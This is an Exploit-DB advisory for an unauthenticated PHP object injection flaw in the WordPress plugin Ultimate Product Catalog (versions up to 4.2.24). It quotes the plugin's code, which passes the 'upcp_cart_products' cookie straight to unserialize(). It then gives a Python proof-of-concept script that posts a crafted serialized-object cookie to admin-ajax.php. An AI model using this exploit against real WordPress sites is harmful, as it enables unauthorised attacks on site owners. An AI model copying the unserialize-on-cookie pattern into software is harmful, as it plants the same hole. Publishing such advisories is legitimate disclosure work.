WordPress Plugin Ultimate Product Catalog 4.2.24 - PHP Object Injection

EDB-ID: 43065
Author: tomplixsee
Published: 2017-10-30
CVE: N/A
Type: Webapps
Platform: PHP
Vulnerable App: Download Vulnerable Application 

 # Google Dork: [NA] 
 # Date: [Okt 30 2017] 
 # Exploit Author: [tomplixsee] 
 # Author blog : [cupuzone.wordpress.com] 
 # Vendor Homepage: [http://www.etoilewebdesign.com/plugins/ultimate-product-catalog/] 
 # Software Link: [https://wordpress.org/plugins/ultimate-product-catalogue/] 
 # Version: [<= 4.2.24]  
 # Tested on: [Ubuntu Server 16.04] 
 # CVE : [NA] 
  
 tested on app version 4.2.23, 4.2.24 
  
 we can send an evil cookie (login not required) to vulnerable function 
 1. vulnerable code on Functions/Process_Ajax.php <= tested 
  
    203 // Adds an item to the plugin's cart 
    204 function UPCP_Add_To_Cart() { 
    205 global $woocommerce; 
    206 global $wpdb; 
    207 global $items_table_name; 
    208 
    209 $WooCommerce_Checkout = get_option("UPCP_WooCommerce_Checkout"); 
    210 
    211 if ($WooCommerce_Checkout == "Yes") { 
    212 $WC_Prod_ID = $wpdb->get_var($wpdb->prepare("SELECT Item_WC_ID FROM $items_table_name WHERE Item_ID=%d", sanitize_text_field($_POST['prod_ID']))); 
    213 echo "WC ID: " . $WC_Prod_ID . "<Br>"; 
    214 $woocommerce->cart->add_to_cart($WC_Prod_ID); 
    215 } 
    216 
    217 if (isset($_COOKIE['upcp_cart_products'])) { 
    218 $Products_Array = unserialize(str_replace('\"', '"', $_COOKIE['upcp_cart_products'])); 
    219 } 
    220 else { 
    221 $Products_Array = array(); 
    222 } 
    223 
    224 $Products_Array[] = $_POST['prod_ID']; 
    225 $Products_Array = array_unique($Products_Array); 
    226 setcookie('upcp_cart_products', serialize($Products_Array), time()+3600*24*3, "/"); 
    227 } 
    228 add_action('wp_ajax_upcp_add_to_cart', 'UPCP_Add_To_Cart'); 
    229 add_action( 'wp_ajax_nopriv_upcp_add_to_cart', 'UPCP_Add_To_Cart' ); 
  
 2. vulnerable code on Functions/Shortcodes.php <= not tested 
    
 POC 
 1. use a WP plugin to test php object injection,  
 like this one https://www.pluginvulnerabilities.com/2017/07/24/wordpress-plugin-for-use-in-testing-for-php-object-injection/ 
  
 2. make a request  
 #----------------------------------- 
 #! /usr/bin/python 
 import requests 
 url = "http://vbox-ubuntu-server.me/wordpress/wp-admin/admin-ajax.php?"; 
 data = {'action':'upcp_add_to_cart'} 
 headers = { 
 'Content-type': 'application/x-www-form-urlencoded', 
 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8', 
 'Cookie': 'upcp_cart_products=O:20:"PHP_Object_Injection":0:{}' 
 } 
 r = requests.post(url, data=data, headers=headers) 
  
 print r.content 
  
 #------------------------------------

Source: www.exploit-db.com
Related Posts